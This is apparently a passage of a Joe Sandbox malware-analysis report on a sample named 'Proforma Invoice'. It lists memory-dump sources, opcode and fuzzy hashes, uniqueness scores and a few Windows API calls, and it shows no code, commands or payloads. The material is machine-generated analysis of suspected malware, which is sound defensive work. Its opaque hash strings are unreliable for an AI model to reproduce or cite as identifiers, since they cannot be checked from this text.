Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 48286fed00bcbb4736926c2cb139b1add0aef4510ba4912c4c0c1929db5d4371
• Instruction ID: 03bb56426afd7da451255b73326a285e48809368160feec8af619d7b25afdf7e
• Opcode Fuzzy Hash: 48286fed00bcbb4736926c2cb139b1add0aef4510ba4912c4c0c1929db5d4371
• Instruction Fuzzy Hash: 28416BB4A003058FDB50CF99C488BAABBF5FF88314F28C459E519AB721D770A845CFA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph not extracted; node/edge dump omitted): 5 basic blocks between 6965808 and 69658ad. LoadLibraryExW is called from block 6965858-6965887.
APIs
• LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0696587A
Memory Dump Source
• Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: d970c18dd65429b932d395be515cfb7ae484144b58e912b7bae2ff88bc2421d8
• Instruction ID: c0cd17c6c0e4e83eb6ea7719e4e0a057086a065d7327d6e34bea8c67a93ccdc0
• Opcode Fuzzy Hash: d970c18dd65429b932d395be515cfb7ae484144b58e912b7bae2ff88bc2421d8
• Instruction Fuzzy Hash: C71112B6C003498FDB10CFAAD844BDEBBF4AB88324F15852AE429A7610C375A545CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph not extracted; node/edge dump omitted): 5 basic blocks between 6965810 and 69658ad. LoadLibraryExW is called from block 6965858-6965887.
APIs
• LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0696587A
Memory Dump Source
• Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 49d968bc34128191c5e44a355b424d80785b796a170de110b446f18af1c433fc
• Instruction ID: ec10f11e029e80d684e78a9793b76a3fb88e0607a421c2154ea270d2b3615609
• Opcode Fuzzy Hash: 49d968bc34128191c5e44a355b424d80785b796a170de110b446f18af1c433fc
• Instruction Fuzzy Hash: 5311F3B6D003499FDB10CF9AC444BDEFBF8EB88324F15842AE519A7610C375A545CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph not extracted; node/edge dump omitted): 5 basic blocks between 69648e4 and 6965638. GetModuleHandleW is called from block 69655f0-696561b.
APIs
• GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,069653DB), ref: 0696560E
Memory Dump Source
• Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 6ee884339721365fbd31903c28a2c467d867cb50477d73183a4c821328bd9b2a
• Instruction ID: bd9724403d40945ee5435321e57c9129c6e84ff06f97eed99e2cd78d6b45a136
• Opcode Fuzzy Hash: 6ee884339721365fbd31903c28a2c467d867cb50477d73183a4c821328bd9b2a
• Instruction Fuzzy Hash: E41102B6C003498FDB20CF9AC448BDEFBF8EF88224F15841AE819A7600D375A545CFA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph not extracted; node/edge dump omitted): 4 basic blocks between 696e4fb and 696e588. OleInitialize is called from block 696e500-696e562.
APIs
• OleInitialize.OLE32(00000000), ref: 0696E555
Memory Dump Source
• Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: f0135212b0493cada7e7db5aaeef9229514026da849e1a14f2e62aeb1cbddb09
• Instruction ID: cb5d0a2f65022c7484e9f940ad0444e8f2ac9b4733f9b0868b80fa860331b8f5
• Opcode Fuzzy Hash: f0135212b0493cada7e7db5aaeef9229514026da849e1a14f2e62aeb1cbddb09
• Instruction Fuzzy Hash: 471115B58043488FCB20DF9AD449BDEBBF4AB48324F14841AE519A7600D378A544CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (rendered graph not extracted; node/edge dump omitted): 3 basic blocks between 696c9b0 and 696e588. OleInitialize is called from block 696c9b0-696e562.
APIs
• OleInitialize.OLE32(00000000), ref: 0696E555
Memory Dump Source
• Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: fabd3dc3803c397a49e4e36ed0b5fbbaf193acb4223764e5be69dce9c800911d
• Instruction ID: fe744109968f37debf49d278a9b9a5d56873ffe1828f617dd6f66eb494f5b63d
• Opcode Fuzzy Hash: fabd3dc3803c397a49e4e36ed0b5fbbaf193acb4223764e5be69dce9c800911d
• Instruction Fuzzy Hash: DA1145B5804348CFDB10DF9AC448BDEBBF4EB48324F14881AE519A7600D374A944CFA5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 102b82f0bd8e17e8b2d591f2330e30ff5084ec61f2224c1efab0afce12c8df57
• Instruction ID: 8927d3a6fb869ffb52737a7584bc1e4847f9d95c299b112f796f78326e8f0523
• Opcode Fuzzy Hash: 102b82f0bd8e17e8b2d591f2330e30ff5084ec61f2224c1efab0afce12c8df57
• Instruction Fuzzy Hash: BC32BF30F402098FDB90EBB8D9486ADB7F2AF89314F148869D509DB391EB35DC45CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d772f73875113579daaf92eea73a0a87aa0042ed929a04b7247e2fe4ca8ef4ea
• Instruction ID: fba3ae4164dbe827553a14e8ed4b3860bb75f931881908beaf7bcb1b8389397e
• Opcode Fuzzy Hash: d772f73875113579daaf92eea73a0a87aa0042ed929a04b7247e2fe4ca8ef4ea
• Instruction Fuzzy Hash: 92D1C631B093899FE7429729CC2576A7BF69F86304F1980B2E548CF3A2EA75DC05C761
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48ada2a70b61b27d4a73a39aa3f98dca87fe1c43726e77645f96ead27ce748c3
• Instruction ID: 133b8e96dd27b28d1b9b6f46c8d6460ebad8c311d29846952b951ddbf8f2d7cc
• Opcode Fuzzy Hash: 48ada2a70b61b27d4a73a39aa3f98dca87fe1c43726e77645f96ead27ce748c3
• Instruction Fuzzy Hash: 1DD1E270A002098FDB64EF68C454AAEBBF6FF89314F15846AD109DB792DB34DC46CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                    • Opcode ID: 4b0c97f6f61fe9f48cd51594aa44b96c261162b96dbf0c7d23463e3867881edd
                                                                                                    • Instruction ID: d699444345fc3edabb8b45ac4373a5112a6015881c77216a049c58734ac5471b
                                                                                                    • Opcode Fuzzy Hash: 4b0c97f6f61fe9f48cd51594aa44b96c261162b96dbf0c7d23463e3867881edd
                                                                                                    • Instruction Fuzzy Hash: B9D1F831A042059FC761EF68C884AAABBB6FF86324F15C565E918CB391D735EC11CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1d1e313fc01d247872eee627d7f0b43b3dc64cc536a59b0e663a9ea73db732e9
                                                                                                    • Instruction ID: 8e8da9b968ea0382975fc129b789e2c98e5aac0cd33a9fb2bda2a7a9935a5a0e
                                                                                                    • Opcode Fuzzy Hash: 1d1e313fc01d247872eee627d7f0b43b3dc64cc536a59b0e663a9ea73db732e9
                                                                                                    • Instruction Fuzzy Hash: 5FC1BF31A04249DFCF55DFA8C884AEDBFB2FF89310F148156EA05AB262D731AC55CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ac3a1a05e4dcdbe7b549899403e510038c12c0c4c6ac5f460405a95bb20d810e
                                                                                                    • Instruction ID: a20cdbe6da951b7993097085b3692811e633f56af9e3404e3cea7b55811c2f00
                                                                                                    • Opcode Fuzzy Hash: ac3a1a05e4dcdbe7b549899403e510038c12c0c4c6ac5f460405a95bb20d810e
                                                                                                    • Instruction Fuzzy Hash: 41A18C30B002459FDB54EBB8D5287AEBBE2AF89204F148979D406DB795EF34DC06C792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8ba3d887b4f9de60f9f8fae4c573e0ed0364b96b78eb064234eec85962b0ae3c
                                                                                                    • Instruction ID: 8fba77400ba5387a70ed5df34af3578c5ece308321b548a3a754d2a5d0b4cd70
                                                                                                    • Opcode Fuzzy Hash: 8ba3d887b4f9de60f9f8fae4c573e0ed0364b96b78eb064234eec85962b0ae3c
                                                                                                    • Instruction Fuzzy Hash: F5A1DF30B442099FDB85EB64C858B7E77A7AF88705F158429EA0ADB394DF70DC41C7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0a568276928c1ef6cfb109ab0277be8bdb38b4b751bc9d05b3c3d4d9e51d059
                                                                                                    • Instruction ID: 64a6f49b275d5e249a3af6da6532b9c2baced497a40255c7ff3006bd1398abbd
                                                                                                    • Opcode Fuzzy Hash: c0a568276928c1ef6cfb109ab0277be8bdb38b4b751bc9d05b3c3d4d9e51d059
                                                                                                    • Instruction Fuzzy Hash: 07A19F38E043099FCB41EFB4D869A9DBBB1AF48300F158966D514EB369EB35AC05CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c23bbf33477271c6190c13dcd0b14611aba5e248600b3b1d257563ee60a2d9a
                                                                                                    • Instruction ID: 7578fc118d8376ada0291832f85f8f3b712ad37e90db664a957e34afc8b6badb
                                                                                                    • Opcode Fuzzy Hash: 6c23bbf33477271c6190c13dcd0b14611aba5e248600b3b1d257563ee60a2d9a
                                                                                                    • Instruction Fuzzy Hash: DD714D70F402059FDB58EBB8D5687AE76E6AF88304F148939E506DB784EF34DC068792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 85c1324648183b96edc7e4f89cf3f62491f029ae5a67568024b204ee5969aabd
                                                                                                    • Instruction ID: 3685da8161e85960f58eae3753a19dbca196071e9eed114747e5d752ee7f290c
                                                                                                    • Opcode Fuzzy Hash: 85c1324648183b96edc7e4f89cf3f62491f029ae5a67568024b204ee5969aabd
                                                                                                    • Instruction Fuzzy Hash: 9D711370B402098FDB64EB69C890BBEB7B6AF85310F14847AD506DB3D1EA38CD41C7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8bbdb57379d97d58df644a57325ab1f93a6eb546c2cc846c269bc05350c474cb
                                                                                                    • Instruction ID: 92c213798d0e3175ad5548e48755e3b7507fb89c78b24deb84194e2e4ca92140
                                                                                                    • Opcode Fuzzy Hash: 8bbdb57379d97d58df644a57325ab1f93a6eb546c2cc846c269bc05350c474cb
                                                                                                    • Instruction Fuzzy Hash: C971F934B802068FDB95EF2CC894AB97BE5AF49710F1944A9EA15CB371DB70DC41CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2ee4a28d499a9fe2ee0e67d94c2917afe654417e951cc875dc3f357d10c1365c
                                                                                                    • Instruction ID: b074f33987be7da68f2005b4d4dc1bf669d8145c205d5db7d8635e8a4f1cc823
                                                                                                    • Opcode Fuzzy Hash: 2ee4a28d499a9fe2ee0e67d94c2917afe654417e951cc875dc3f357d10c1365c
                                                                                                    • Instruction Fuzzy Hash: 34619C30B402049FE764EB78C858B6EBAE6AFC9704F15C428D40AAB791DF75EC46C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84b4cb0ee37b5a76e70c6d30411838bd766bcdec55d1393427d3d8804cb9abcf
                                                                                                    • Instruction ID: 73c703267b1dfbdcc760db378e712bf8ceacdc10fc8aa4473f9ee41a3d1e52ed
                                                                                                    • Opcode Fuzzy Hash: 84b4cb0ee37b5a76e70c6d30411838bd766bcdec55d1393427d3d8804cb9abcf
                                                                                                    • Instruction Fuzzy Hash: 6351DC32F405159FDB90EB78C858B6EB2A2AF89314F218079DA1DDB7A4DB30DD01CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ba99f6c07b6a96022ce48b465db90db33b523ea6827218d0e8e5c2f1b3adc2c8
                                                                                                    • Instruction ID: ae138d2a42cb13eb39193c9b03ea4079d14de1ee1b1fc6826544b1fabaceb917
                                                                                                    • Opcode Fuzzy Hash: ba99f6c07b6a96022ce48b465db90db33b523ea6827218d0e8e5c2f1b3adc2c8
                                                                                                    • Instruction Fuzzy Hash: FA61A070E407498FDF15CFA9C5446EEBBF2AF89310F20865AE809AB241DB74AD81CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a3c872bc95313e09211fa171bcf3ba16707d5fb85d7cab62a76fad79df9ea860
                                                                                                    • Instruction ID: ba6863de75f9914138001dcee8e03fb1fb5ff6dc14002c6f901d2a289c71d52f
                                                                                                    • Opcode Fuzzy Hash: a3c872bc95313e09211fa171bcf3ba16707d5fb85d7cab62a76fad79df9ea860
                                                                                                    • Instruction Fuzzy Hash: B251AF70D007498FDF21CFA9C5446EDFBF2AF89310F25865AE848AB241DB34AD81CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d396b704229f46fa80f879c626496cb510790838a3cc5731d91fb60f8b8ba332
                                                                                                    • Instruction ID: 08fba63d42c9064f2f011404934b4ab7df808c506007e861350bb7e8e0f208a2
                                                                                                    • Opcode Fuzzy Hash: d396b704229f46fa80f879c626496cb510790838a3cc5731d91fb60f8b8ba332
                                                                                                    • Instruction Fuzzy Hash: 0341A370F511048FDB94EBB4D529B7E7AE6AF88240F148929E806DB385DF34DC06CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e7f6b371f3bfdf18ca163ee2af33b951efcd486c473efb5dbddd7df548164de7
                                                                                                    • Instruction ID: e70e62e7383ae3c655355e1ee9157ee9635f3d0c3befa83517239e650b72fa6e
                                                                                                    • Opcode Fuzzy Hash: e7f6b371f3bfdf18ca163ee2af33b951efcd486c473efb5dbddd7df548164de7
                                                                                                    • Instruction Fuzzy Hash: 5951C878D00309DFCB40EFA4E9A998DBBB1BF48314F518926D525AB728EB31AD45CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c50c3a8408b9cfb5bf2859e7cfb088c37ac1a47c4f8dc342d546da18a32ce094
• Instruction ID: 5f7c7364bd8cd48b8a796d6ebb51e4aac0ace74cc1b0e64cb52ce30ec2ec0f4c
• Opcode Fuzzy Hash: c50c3a8408b9cfb5bf2859e7cfb088c37ac1a47c4f8dc342d546da18a32ce094
• Instruction Fuzzy Hash: 61419E31A44249DFCF55DFA8C844ABDBFB2AF45310F048255EA15AB2A2D331ED54CB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a03a7464a54852857e436d488b8bad7301aeb1ce2389ebe2bad7e68e0d359569
• Instruction ID: 70695b4c41022edaf24081ce84097312696b66edbd0fdee8556337ff3d3ce557
• Opcode Fuzzy Hash: a03a7464a54852857e436d488b8bad7301aeb1ce2389ebe2bad7e68e0d359569
• Instruction Fuzzy Hash: 6A31F231F542499FE780AB74D81977E7BEADB85344F408872D909CB385EA34CD0587A1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: edaffb7647f85be2753d349f723c7e7e3fe92a778ab2af65b3720d2a440b0013
• Instruction ID: 1f96978b9ad765be3baa5c0dabb25f37c74757c5eb72b495d7b54d73df1e2289
• Opcode Fuzzy Hash: edaffb7647f85be2753d349f723c7e7e3fe92a778ab2af65b3720d2a440b0013
• Instruction Fuzzy Hash: 8D41F538A59244EFCB80EB74E45936E7BB1EB41209F5085A9C905C73D1EB388F89CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ed6301ebc26595c3bb5342939873464983b11071265cc7c7890286b928b23042
• Instruction ID: 83650f541e2e1046cb1e727c19c7318b53c0e948fb9e7f9a2ee51aab2b7488a3
• Opcode Fuzzy Hash: ed6301ebc26595c3bb5342939873464983b11071265cc7c7890286b928b23042
• Instruction Fuzzy Hash: 91315E31B101058FDB98EB74D4586AE77B6AF88204B248868E406EB354EF38DD49CBD5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2e56f78b52e15613764a1a0e1bb6bb537d1e9e85139fee80cbb081840699e758
• Instruction ID: 46586364a0958c8db08d288c9003dfb3e83ff23469ddebb48fe6a70ee50ce117
• Opcode Fuzzy Hash: 2e56f78b52e15613764a1a0e1bb6bb537d1e9e85139fee80cbb081840699e758
• Instruction Fuzzy Hash: 9D319E71B001058FDB58EBB4D4596AEB7B2AF98204B248868E406EB344EF38CD49CB95
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: db869fd9352317e0d71550f787118ca7332733e1c139a17e5f3b5a9aeb94101f
• Instruction ID: 76a1b53b39e0e0bdea9c3ad76b6a7b00ac4583ff9645506de32cbc9993f0a1ae
• Opcode Fuzzy Hash: db869fd9352317e0d71550f787118ca7332733e1c139a17e5f3b5a9aeb94101f
• Instruction Fuzzy Hash: 7D31D130F482099FDB84E7B8C8157AE7BF29B85204F1580B6D609DB381EB359D45C791
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 369e6cbd557f10f377c4b5302e39bdf2dd91ab9f364f8f478add44faac87173c
• Instruction ID: c55adf104200c894a4b2b95799cead7edd03e30697ba15ff1dc47150e191e390
• Opcode Fuzzy Hash: 369e6cbd557f10f377c4b5302e39bdf2dd91ab9f364f8f478add44faac87173c
• Instruction Fuzzy Hash: FB31B471E042099FDB80EFA9D9846AEBBF6EB94314F14807AD508E7355E731EC45CB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50bb4c0e43ce8ad2939f20de7f506d7d5fc49ee732302984b293ccd667742699
• Instruction ID: bcc9b722bdea350fcc866cc9e9887f376a69d0dd00d72f70e833ef4d46c3bb29
• Opcode Fuzzy Hash: 50bb4c0e43ce8ad2939f20de7f506d7d5fc49ee732302984b293ccd667742699
• Instruction Fuzzy Hash: 32216D75F402159FEB90AFB899486AE7BE5AB8C255F108835EA19E7740FB308D018B94
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d9826ef31518d970afc5654482a08fd612a2a4be99692e94ff866dee0f00a71
• Instruction ID: 5354b3b9b641dfe98ca884edbc7683abce70ab14c889c4b879b3908400933aae
• Opcode Fuzzy Hash: 5d9826ef31518d970afc5654482a08fd612a2a4be99692e94ff866dee0f00a71
• Instruction Fuzzy Hash: FC214135F402159FEB90AFB999486AE7BE5AB4C654F108435DA19E7740FF309C018B94
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 139c7f5350a04f108392efcbb0ecfb3ee3fc67625c904dc81786a9cab6de2301
• Instruction ID: 6696b1af93eb92612e6f12c41d75652071aa2295d17a9a8fd0f5ccd48eff48ab
• Opcode Fuzzy Hash: 139c7f5350a04f108392efcbb0ecfb3ee3fc67625c904dc81786a9cab6de2301
• Instruction Fuzzy Hash: AE216630E0124D9FEB46EFA5E490AEEBFB6AF49305F248069E411F6250DB31DA41DF60
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
